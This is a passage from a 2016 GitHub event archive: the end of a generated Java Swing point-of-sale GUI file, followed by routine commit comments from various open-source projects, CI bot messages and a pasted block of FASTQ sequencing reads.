.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n        );\r\n        jPanel4Layout.setVerticalGroup(\r\n            jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel4Layout.createSequentialGroup()\r\n                .addContainerGap()\r\n                .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(jButton19)\r\n                    .addComponent(jButton21)\r\n                    .addComponent(jButton20)\r\n                    .addComponent(jButton22))\r\n                .addContainerGap(78, Short.MAX_VALUE))\r\n        );\r\n\r\n        jButton7.setText(\"T7\");\r\n\r\n        jButton8.setText(\"T8\");\r\n\r\n        jButton9.setText(\"T9\");\r\n\r\n        javax.swing.GroupLayout jPanel10Layout = new javax.swing.GroupLayout(jPanel10);\r\n        jPanel10.setLayout(jPanel10Layout);\r\n        jPanel10Layout.setHorizontalGroup(\r\n            jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel10Layout.createSequentialGroup()\r\n                .addGap(31, 31, 31)\r\n                .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)\r\n                    .addComponent(jButton7, javax.swing.GroupLayout.DEFAULT_SIZE, 63, Short.MAX_VALUE)\r\n                    .addComponent(jButton8, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                    .addComponent(jButton9, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n                .addContainerGap(29, Short.MAX_VALUE))\r\n        );\r\n        jPanel10Layout.setVerticalGroup(\r\n            jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel10Layout.createSequentialGroup()\r\n                .addContainerGap(54, Short.MAX_VALUE)\r\n                .addComponent(jButton7, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addGap(29, 29, 29)\r\n                .addComponent(jButton8, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addGap(31, 31, 31)\r\n                .addComponent(jButton9, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addGap(53, 53, 53))\r\n        );\r\n\r\n        javax.swing.GroupLayout jPanel6Layout = new javax.swing.GroupLayout(jPanel6);\r\n        jPanel6.setLayout(jPanel6Layout);\r\n        jPanel6Layout.setHorizontalGroup(\r\n            jPanel6Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel6Layout.createSequentialGroup()\r\n                .addContainerGap()\r\n                .addGroup(jPanel6Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)\r\n                    .addComponent(jPanel4, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                    .addComponent(jPanel3, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n                .addGap(18, 18, 18)\r\n                .addComponent(jPanel10, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(104, Short.MAX_VALUE))\r\n        );\r\n        jPanel6Layout.setVerticalGroup(\r\n            jPanel6Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel6Layout.createSequentialGroup()\r\n                .addContainerGap()\r\n                .addGroup(jPanel6Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)\r\n                    .addComponent(jPanel10, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                    .addComponent(jPanel3, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n                .addGap(18, 18, 18)\r\n                .addComponent(jPanel4, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(44, Short.MAX_VALUE))\r\n        );\r\n\r\n        jTabbedPane1.addTab(\"Table Arrangement\", jPanel6);\r\n\r\n        javax.swing.GroupLayout jPanel5Layout = new javax.swing.GroupLayout(jPanel5);\r\n        jPanel5.setLayout(jPanel5Layout);\r\n        jPanel5Layout.setHorizontalGroup(\r\n            jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addComponent(jTabbedPane1)\r\n        );\r\n        jPanel5Layout.setVerticalGroup(\r\n            jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addComponent(jTabbedPane1)\r\n        );\r\n\r\n        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());\r\n        getContentPane().setLayout(layout);\r\n        layout.setHorizontalGroup(\r\n            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addComponent(jPanel5, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n        );\r\n        layout.setVerticalGroup(\r\n            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(layout.createSequentialGroup()\r\n                .addComponent(jPanel5, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                .addContainerGap())\r\n        );\r\n        pack();\r\n    }// </editor-fold>                        \r\n\r\n    /**\r\n     * @param args the command line arguments\r\n     */\r\n    public static void main(String args[]) {\r\n        \r\n        try {\r\n            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\r\n                if (\"Nimbus\".equals(info.getName())) {\r\n                    javax.swing.UIManager.setLookAndFeel(info.getClassName());\r\n                    break;\r\n                }\r\n            }\r\n        } catch (ClassNotFoundException ex) {\r\n            java.util.logging.Logger.getLogger(PointOfSales.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        } catch (InstantiationException ex) {\r\n            java.util.logging.Logger.getLogger(PointOfSales.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        } catch (IllegalAccessException ex) {\r\n            java.util.logging.Logger.getLogger(PointOfSales.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        } catch (javax.swing.UnsupportedLookAndFeelException ex) {\r\n            java.util.logging.Logger.getLogger(PointOfSales.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        }\r\n        //</editor-fold>\r\n        \r\n\r\n        /* Create and display the form */\r\n        java.awt.EventQueue.invokeLater(new Runnable() {\r\n            public void run() {\r\n                new PointOfSales().setVisible(true);\r\n            }\r\n        });\r\n    }\r\n\r\n    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                         \r\n        this.setVisible(false);\r\n        new CashRegister().setVisible(true);\r\n        this.dispose();// TODO add your handling code here:\r\n    }      \r\n    // Variables declaration - do not modify                     \r\n    private javax.swing.JButton jButton1;\r\n    private javax.swing.JButton jButton19;\r\n    private javax.swing.JButton jButton2;\r\n    private javax.swing.JButton jButton20;\r\n    private javax.swing.JButton jButton21;\r\n    private javax.swing.JButton jButton22;\r\n    private javax.swing.JButton jButton3;\r\n    private javax.swing.JButton jButton4;\r\n    private javax.swing.JButton jButton5;\r\n    private javax.swing.JButton jButton6;\r\n    private javax.swing.JButton jButton7;\r\n    private javax.swing.JButton jButton8;\r\n    private javax.swing.JButton jButton9;\r\n    private javax.swing.JPanel jPanel10;\r\n    private javax.swing.JPanel jPanel3;\r\n    private javax.swing.JPanel jPanel4;\r\n    private javax.swing.JPanel jPanel5;\r\n    private javax.swing.JPanel jPanel6;\r\n    private javax.swing.JTabbedPane jTabbedPane1;\r\n    // End of variables declaration                   \r\n\r\n}\r\n"}},"created_at":"2016-09-05T15:03:42Z"}
{"id":"4517354730","type":"CommitCommentEvent","actor":{"login":"varund7726"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":18901351,"position":null,"line":null,"path":null,"commit_id":"54343cc5f66461477875616565c170b858acbec0","created_at":"2016-09-05T15:04:07Z","updated_at":"2016-09-05T15:04:07Z","body":"Both options are already there. Maintainer needs to add options in device tree. Please ask your maintainer "}},"created_at":"2016-09-05T15:04:07Z"}
{"id":"4517358310","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18901360,"position":null,"line":null,"path":null,"commit_id":"929ff8d320cec3bdf8ce4977efb6fa18cc539152","created_at":"2016-09-05T15:04:55Z","updated_at":"2016-09-05T15:04:55Z","body":"rate_limit_context "}},"created_at":"2016-09-05T15:04:55Z"}
{"id":"4517359892","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"w3c/elreq"},"payload":{"comment":{"id":18901368,"position":null,"line":null,"path":null,"commit_id":"57a3386b48d0a7e99edad85480549ae930270741","created_at":"2016-09-05T15:05:16Z","updated_at":"2016-09-05T15:05:16Z","body":"for future reference, the way to get around this is to replace & with &amp;\r\n"}},"created_at":"2016-09-05T15:05:16Z"}
{"id":"4517360535","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18901372,"position":null,"line":null,"path":null,"commit_id":"929ff8d320cec3bdf8ce4977efb6fa18cc539152","created_at":"2016-09-05T15:05:24Z","updated_at":"2016-09-05T15:05:24Z","body":"@HWI-EAS121:4:100:1783:550#0/1\r\nCGTTACGAGATCGGAAGAGCGGTTCAGCAGGAATGCCGAGACGGATCTCGTATGCGGTCTGCTGCGTGACAAGACAGGGG\r\n+HWI-EAS121:4:100:1783:550#0/1\r\naaaaa`b_aa`aa`YaX]aZ`aZM^Z]YRa]YSG[[ZREQLHESDHNDDHNMEEDDMPENITKFLFEEDDDHEJQMEDDD\r\n@HWI-EAS121:4:100:1783:1611#0/1\r\nGGGTGGGCATTTCCACTCGCAGTATGGGTTGCCGCACGACAGGCAGCGGTCAGCCTGCGCTTTGGCCTGGCCTTCGGAAA\r\n+HWI-EAS121:4:100:1783:1611#0/1\r\na``^\\__`_```^a``a`^a_^__]a_]\\]`a______`_^^`]X]_]XTV_\\]]NX_XVX]]_TTTTG[VTHPN]VFDZ\r\n@HWI-EAS121:4:100:1783:322#0/1\r\nCGTTTATGTTTTTGAATATGTCTTATCTTAACGGTTATATTTTAGATGTTGGTCTTATTCTAACGGTCATATATTTTCTA\r\n+HWI-EAS121:4:100:1783:322#0/1\r\nabaa`^aaaaabbbaababbbbbb`bbbb_bbbbbbbb`bbbaV^_a``a``]``aT]a__V\\]]_]^a`]a_abbaV__\r\n@HWI-EAS121:4:100:1783:1394#0/1\r\nGGGTCTTTATTGGTCTGGTGATCCCCCATATTCTCCGGTTGTGTGGTTTAACCGATCATCGCGCATTACTTCCCGGCTGC\r\n+HWI-EAS121:4:100:1783:1394#0/1\r\n```[aa\\b^^[]aabbb][`a_abbb`a``bbbbbabaabaaaab_VZa_^___bab_X`[a\\HV_[_]_[^_X\\T_VQQ\r\n@HWI-EAS121:4:100:1783:207#0/1\r\nCCCTGGGAGATCGGAAGAGCGGTTCAGCAGGAATGCCGAGACCGATCTCGTATGCCGTCTTCTGCTTGAAAAAAAAAACA\r\n+HWI-EAS121:4:100:1783:207#0/1\r\nabba`Xa\\^\\\\`aa]ba__bba[a_O_a`aa`aa`a]^V]X_a^YS\\R_\\H_[]\\ZTDUZZUSOPX]]POP\\GS\\WSHHD\r\n@HWI-EAS121:4:100:1783:455#0/1\r\nGGGTAATTCAGGGACAATGTAATGGCTGCACAAAAAAATACATCTTTCATGTTCCATTGCACCATTGACAAATACATATT\r\n+HWI-EAS121:4:100:1783:455#0/1\r\nabb_babbabaabbbbbbbbbbbbbbbba\\`b`\\abbbabbbbabbbbbbaabbbbb`bb`ab_O_bab_Q_bbabaa_a\r\n@HWI-EAS121:4:100:1783:1837#0/1\r\nCCCTGGGAGATCGGAAGAGCGGTTCAGCAGGAATGCCGAGACCGATATCGTATGCCGTCTTCTGCTTTAATAAAAAAAAA\r\n+HWI-EAS121:4:100:1783:1837#0/1\r\naaaaaab`aaaaaa\\aaabaaaZ`b`baaaaTYXZ\\Q\\YZ[^_]MOOQPMHDPRFTTNHH[GMJDRODDDHNNWTUVXPG\r\n@HWI-EAS121:4:100:1783:1127#0/1\r\nTGCTTCTACCGGAGGGAGTACAATGTCTTCCACTGTGATCATCAACTGAATGATCCCCTTCCCAACTGAAATCCTCCTTT\r\n+HWI-EAS121:4:100:1783:1127#0/1\r\naaaabbbaaaaaaabbaa`babbbbababaa_aa`^aabaabbb``ab]baaaaaaaaaaaaa`aa`aY^_baa`a^[a_\r\n@HWI-EAS121:4:100:1783:1973#0/1\r\nCTGTTATTTACTTTTTAGCATAGTACATCACACATTTTGATGCACAAATATCAGAAAATCATGGTTGCCTAGGCTCCATC\r\n+HWI-EAS121:4:100:1783:1973#0/1\r\nabbbbbbbbbabbbbbbbbbbbbbbbbbbba^abbbbbbbbbbbba\\abbbba`a_`abbba_[]aaa`^_XX]aa`a_X\r\n@HWI-EAS121:4:100:1783:1006#0/1\r\nCGTATAATATTTTTTTTTGTAATTCTAATATTATTCAAGTCTTATTAAAAGGTCATTAAATACAATATTAGTGCTATAAA\r\n+HWI-EAS121:4:100:1783:1006#0/1\r\nabaabaababbbbbbbbabbbbbbbbbbbbbbbbbbbbbbbbbbba_`ab`a`bbbbaZabbbabbbbba``babbbb^U\r\n@HWI-EAS121:4:100:1783:1349#0/1\r\nCCCTTATACACCAATTAAATTATGAGATTAATTGCTCAACATTTAACTCCTATATAATAGATAATGATTAATTGTCACAA\r\n+HWI-EAS121:4:100:1783:1349#0/1\r\na`abb`aZ^aa]bbaabbabbbabbbWbbbbbbbbbbbbaabbbbbbbaababbbbabbabbbbbbabba^aab`baa^Z\r\n@HWI-EAS121:4:100:1783:822#0/1\r\nCGTTGTCTCGCGACCTGGATAAATTCCTGTGGTTTATCGAGTCTAACATCGAATAAATCCATCGCTGATGGTGCAGAACT\r\n+HWI-EAS121:4:100:1783:822#0/1\r\nababaabbbaaabbbbbbbbbbbbbbbbbabbabbbbbb`bbbbbbbbbaa``aaa\\a_\\]b`]`aaab_\\]``^Z^a_b\r\n@HWI-EAS121:4:100:1783:1539#0/1\r\nGGGTTTTTTCTCTCTGTTTTTATGGCTAACTCCTCCTCTTTTTCCAACCCCAAGACTTATATTTTTCCCTCTTCCTTCCC\r\n+HWI-EAS121:4:100:1783:1539#0/1\r\naaa^aaabbaa`bbbbaabbaabaabbaFDYRIRW\\SZ``a]ZQV^]J_XMQDPQFMYFLFV_GX^FE^FTXUF[URD]`\r\n@HWI-EAS121:4:100:1784:1302#0/1\r\nCCCTGGGAGATCGGAAGAGCGGTTCAGCAGGAATGCCGAGACCGATCTCGTCTGCCGTCTTCTGCTTTTAACAAACTAAC\r\n+HWI-EAS121:4:100:1784:1302#0/1\r\nabbbaab`b`_b_aaa[\\abab`a_Z_b]baZ__X`a]IYT\\_\\YQNFUUGDKQMWTHMY]HVOKDQDODTKWSDDDODD\r\n@HWI-EAS121:4:100:1784:1374#0/1\r\nTGCTTTTATCATATTTTGGGGGCAGAGGAATGCTGTTAAACATGGTATCTAGTTGCATTGAGAGGAAGTTTATGCAGAAT\r\n+HWI-EAS121:4:100:1784:1374#0/1\r\nababbbbaaaababbbbbbbbbbabbbbbabbabbbbba`abbbba`bbba`aabaabab^bab^]Y_aaa`a[ZU`\\\\_\r\n@HWI-EAS121:4:100:1784:740#0/1\r\nCCCTAAAAGAATAGTGTTCTGGTTTTGATAAATGATAATCTAACCTTTTATTTAATTAATTAAAGTTTAAAGATAATCTA\r\n+HWI-EAS121:4:100:1784:740#0/1\r\nabbbbaaaa`abbb`bbbbbbb`bbbbbbbbbbbbbbbbbbbbbbbbbbbbba`abba`abba`a`b`a_\\V\\b^G]aa`\r\n@HWI-EAS121:4:100:1784:1450#0/1\r\nCTGTAGTCTTGTCCTCCAATTTAAGGGAGTCTTAAGAGGATCTGCCAGGAGCCAATAATTAAAAACAGAATCACATTTTA\r\n+HWI-EAS121:4:100:1784:1450#0/1\r\nabb_ababbbb`babbbaabababbbb_babbbabbbba^bbbba_]a`abaababbabba^abaabba`aaaaabba^L\r\n@HWI-EAS121:4:100:1784:873#0/1\r\nCGTTACGAGATCGGAAGAGCGGTTCAGCAGGCATGCCGAGACCGATCTCGTATGCCGTCTTCTGCTTTAACAAAAAAACT\r\n+HWI-EAS121:4:100:1784:873#0/1\r\naa_bWa^_ba]```K_`Y``aa\\aa`b`aaZM\\[[__RH[b^_aYPDV[TXLWW\\_WXZ\\RUVSPVOFP[X[DYXWKVLH\r\n@HWI-EAS121:4:100:1784:1471#0/1\r\nTGCTCCATAAATTTACGTACGGTGGCGGAGCGCAGCAGAGGCGGATAAAAGTGCGCGTGCAGCTGCCAGTGTTGATTCTC\r\n+HWI-EAS121:4:100:1784:1471#0/1\r\naabbbaaa__^aab^b`Z_b_Q__`[`_aaabbbbbYTOZ[^Y_V]`\\`]VPVZT[_`]]V]]UR\\YN\\U]\\ZYFZT\\ZG\r\n@HWI-EAS121:4:100:1784:870#0/1\r\nCGTTGCAGATGACTTGTTGGATGATGTTTCCACTGAAGTTCTACGAAGGGAAATAATGACTCAGGATAAGAAGGCCAAAA\r\n+HWI-EAS121:4:100:1784:870#0/1\r\nabaaaa`baaaaabbabaaabbbbabbbbbbabbb`a^abbbbab__a`a__abbaa`_`aaa_\\_aaaa_X[`_a]\\^a"}},"created_at":"2016-09-05T15:05:24Z"}
{"id":"4517364284","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18901378,"position":null,"line":null,"path":null,"commit_id":"929ff8d320cec3bdf8ce4977efb6fa18cc539152","created_at":"2016-09-05T15:06:12Z","updated_at":"2016-09-05T15:06:12Z","body":"https://api.twitter.com/1.1/statuses/mentions_timeline.json"}},"created_at":"2016-09-05T15:06:12Z"}
{"id":"4517366470","type":"CommitCommentEvent","actor":{"login":"ichrispa"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":18901386,"position":null,"line":null,"path":null,"commit_id":"dfad8fa02f27a45b6d1ef1db8836d74b75cfdaa7","created_at":"2016-09-05T15:06:42Z","updated_at":"2016-09-05T15:06:42Z","body":"Yes, @Pro, there is.\r\n\r\nWhen generating namespaces, the compiler parses the encoding of structs - such as UA Arguments. Since they do not necessarily have a datatype, any extensionobject encountered by the compiler will be encoded \"manually\", i.e. without UA_encodeBinary. In order to do that, the generated code needs to provide the encoding offset.\r\n\r\nThe only workaround is to provide UA_DataType descriptions for all and any encodable objects in a namespace, which is undesired at this time. It would provide duplicates to those generated with generate_datatypes.py\r\n\r\n\r\n@All: Please *do* check if removing features like this produces errors, especially with non-default enabled build option. Removing UA_ENCODINGOFFSET_BINARY pretty much killed any namespace containing function, which included our exampleserver - a problem which could habe been detected early on. Yet all tests on Travis where passing."}},"created_at":"2016-09-05T15:06:42Z"}
{"id":"4517367584","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18901388,"position":25,"line":25,"path":"debug.cc","commit_id":"6f2eddcad036b5e6feb51fab525d7bdafe426986","created_at":"2016-09-05T15:06:57Z","updated_at":"2016-09-05T15:06:57Z","body":"Ok, that's fine then."}},"created_at":"2016-09-05T15:06:57Z"}
{"id":"4517370459","type":"CommitCommentEvent","actor":{"login":"huangrui127"},"repo":{"name":"huangrui127/Temp"},"payload":{"comment":{"id":18901394,"position":null,"line":null,"path":null,"commit_id":"5174ac0c0e08a4648e8d1534271215475fa94257","created_at":"2016-09-05T15:07:37Z","updated_at":"2016-09-05T15:07:37Z","body":"111"}},"created_at":"2016-09-05T15:07:37Z"}
{"id":"4517371809","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18901397,"position":null,"line":null,"path":null,"commit_id":"530ed4b3b498ee95078522eb77b1377e3977ca49","created_at":"2016-09-05T15:07:57Z","updated_at":"2016-09-05T15:07:57Z","body":"I was just referring to duping built items with output like:\r\n```sqf\r\n\"Land_wreck_cinder\",\"Land_wood_wreck_quarter\",\"Land_wood_wreck_floor\",\r\n```\r\npotentially being a problem with this change. But if it was I think we would have heard more about it, since this check was not there in 1051.\r\n\r\nRemoving mines and supply crates is not an issue at all now. The only time it might be a problem is if the server is lagging so hard that a player is able to complete removal and run >10m away before the wreck is deleted for another player. It may be possible on a loaded server, so feel free to increase this to 20 or 30m if you feel it is warranted. "}},"created_at":"2016-09-05T15:07:57Z"}
{"id":"4517375627","type":"CommitCommentEvent","actor":{"login":"mpoapostolis"},"repo":{"name":"mpoapostolis/Diathymia"},"payload":{"comment":{"id":18901404,"position":null,"line":null,"path":null,"commit_id":"52145378a05cb6ab45777aafe2e2ebccfa380dc5","created_at":"2016-09-05T15:08:53Z","updated_at":"2016-09-05T15:08:53Z","body":"if local storage didnt exist app didnt load "}},"created_at":"2016-09-05T15:08:53Z"}
{"id":"4517376183","type":"CommitCommentEvent","actor":{"login":"SMundt"},"repo":{"name":"SMundt/iobroker.lgtv"},"payload":{"comment":{"id":18901407,"position":149,"line":148,"path":"io-package.json","commit_id":"7af1a1e58cb6d9313451214eaffb874df333aed0","created_at":"2016-09-05T15:09:01Z","updated_at":"2016-09-05T15:09:01Z","body":"@GermanBluefox,\r\n\r\nHow can I use the short variants (e.g. \"LiveTV\", \"Smart share\") in the main JavaScript instead of the long commands?"}},"created_at":"2016-09-05T15:09:01Z"}
{"id":"4517376487","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18901410,"position":null,"line":null,"path":null,"commit_id":"0d66b4d7133866e85cbc92ea74840b7718bb5143","created_at":"2016-09-05T15:09:07Z","updated_at":"2016-09-05T15:09:07Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/386/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T15:09:07Z"}
{"id":"4517380414","type":"CommitCommentEvent","actor":{"login":"okajun35"},"repo":{"name":"okajun35/KIvy_calculator"},"payload":{"comment":{"id":18901428,"position":null,"line":null,"path":null,"commit_id":"c602e65566aabe2c6b85a3a7b30951e16e50b61a","created_at":"2016-09-05T15:10:00Z","updated_at":"2016-09-05T15:10:00Z","body":"vss2015でのコミット"}},"created_at":"2016-09-05T15:10:00Z"}
{"id":"4517382654","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18901438,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T15:10:31Z","updated_at":"2016-09-05T15:10:31Z","body":"doclint does not accept the previous version which is why I fixed it. Also you missed a commit again, what I did is that I put back your version from which I just removed the <p> you put around the <pre> (which I first tried to refactor to use {@code})."}},"created_at":"2016-09-05T15:10:31Z"}
{"id":"4517386217","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901447,"position":17,"line":813,"path":"cura/Settings/MachineManager.py","commit_id":"67636d6f3c8d0f6f10d986b0591d9ed71a3d53bd","created_at":"2016-09-05T15:11:21Z","updated_at":"2016-09-05T15:11:21Z","body":"Because the we set the name of all materials from a single xml profile as being with the same name. So if you pop the name, we simply get -any- material profile that matches nozzle size. What we want is that we get the generic profile of the material. Popping the variant from it does result in this behavior."}},"created_at":"2016-09-05T15:11:21Z"}
{"id":"4517390771","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18901456,"position":null,"line":null,"path":null,"commit_id":"a31bca4bd5aa10edf03ba71d691482823d1973a2","created_at":"2016-09-05T15:12:28Z","updated_at":"2016-09-05T15:12:28Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/387/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T15:12:28Z"}
{"id":"4517392496","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901461,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:12:53Z","updated_at":"2016-09-05T15:12:53Z","body":"hello,\r\nfake User-Agent Mozilla/5.0 is now banned on tile.openstreetmap.org.\r\nthis should default to real non-faked user-agent string, i.e. QGIS/2.17.0 or similar, to get passed through and properly managed."}},"created_at":"2016-09-05T15:12:53Z"}
{"id":"4517394364","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901466,"position":31,"line":105,"path":"cura/PlatformPhysics.py","commit_id":"4817dbe62ffef1b4ee9cc3e950e63be04e27be94","created_at":"2016-09-05T15:13:20Z","updated_at":"2016-09-05T15:13:20Z","body":"At this point, these are both `x = 0` and `z = 0`."}},"created_at":"2016-09-05T15:13:20Z"}
{"id":"4517394735","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901468,"position":8,"line":8,"path":"index.html","commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:13:25Z","updated_at":"2016-09-05T15:13:25Z","body":"コーディング規約より、htmlタグは省略すべき"}},"created_at":"2016-09-05T15:13:25Z"}
{"id":"4517395288","type":"CommitCommentEvent","actor":{"login":"GermanBluefox"},"repo":{"name":"SMundt/iobroker.lgtv"},"payload":{"comment":{"id":18901471,"position":149,"line":148,"path":"io-package.json","commit_id":"7af1a1e58cb6d9313451214eaffb874df333aed0","created_at":"2016-09-05T15:13:33Z","updated_at":"2016-09-05T15:13:33Z","body":"It is only for GUI, not for code. \r\nIf you will try to control it in admin or in \"mobile\" you will see the short names.\r\nIn the code you must still use long names."}},"created_at":"2016-09-05T15:13:33Z"}
{"id":"4517395622","type":"CommitCommentEvent","actor":{"login":"gowithplanb"},"repo":{"name":"minio/s3v2tov4-proxy"},"payload":{"comment":{"id":18901472,"position":null,"line":null,"path":null,"commit_id":"69f9547276e1a8739a6c7a34601e0c289111be1b","created_at":"2016-09-05T15:13:37Z","updated_at":"2016-09-05T15:13:37Z","body":"Thanks for this fix, now the credentials won't display publicly anymore."}},"created_at":"2016-09-05T15:13:37Z"}
{"id":"4517403344","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18901488,"position":null,"line":null,"path":null,"commit_id":"ae129d3b55fa569f1dc117b24e468118a5ed4b07","created_at":"2016-09-05T15:15:31Z","updated_at":"2016-09-05T15:15:31Z","body":"Something happened with this translation?"}},"created_at":"2016-09-05T15:15:31Z"}
{"id":"4517405586","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":18901495,"position":25,"line":25,"path":"posts/Guillaume/2016-09-05-hibernate-validator-530-cr1-out.adoc","commit_id":"ccd0d33f61919d603ddbb46813eb139df1f0c96e","created_at":"2016-09-05T15:16:06Z","updated_at":"2016-09-05T15:16:06Z","body":"Hmmm, any wording proposal? Because I think it's what I meant :)."}},"created_at":"2016-09-05T15:16:06Z"}
{"id":"4517408254","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/Products.TinyMCE"},"payload":{"comment":{"id":18901501,"position":null,"line":null,"path":null,"commit_id":"d3c79c9cbeebd43684bde698d390106ae1999e73","created_at":"2016-09-05T15:16:44Z","updated_at":"2016-09-05T15:16:44Z","body":"@micha137 you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-05T15:16:44Z"}
{"id":"4517410539","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901503,"position":null,"line":null,"path":null,"commit_id":"c245fe3febc94021fec4c27f97e953a1c694fd96","created_at":"2016-09-05T15:17:16Z","updated_at":"2016-09-05T15:17:16Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#EtohZ2p4Q1KNvslN_WryjA"}},"created_at":"2016-09-05T15:17:16Z"}
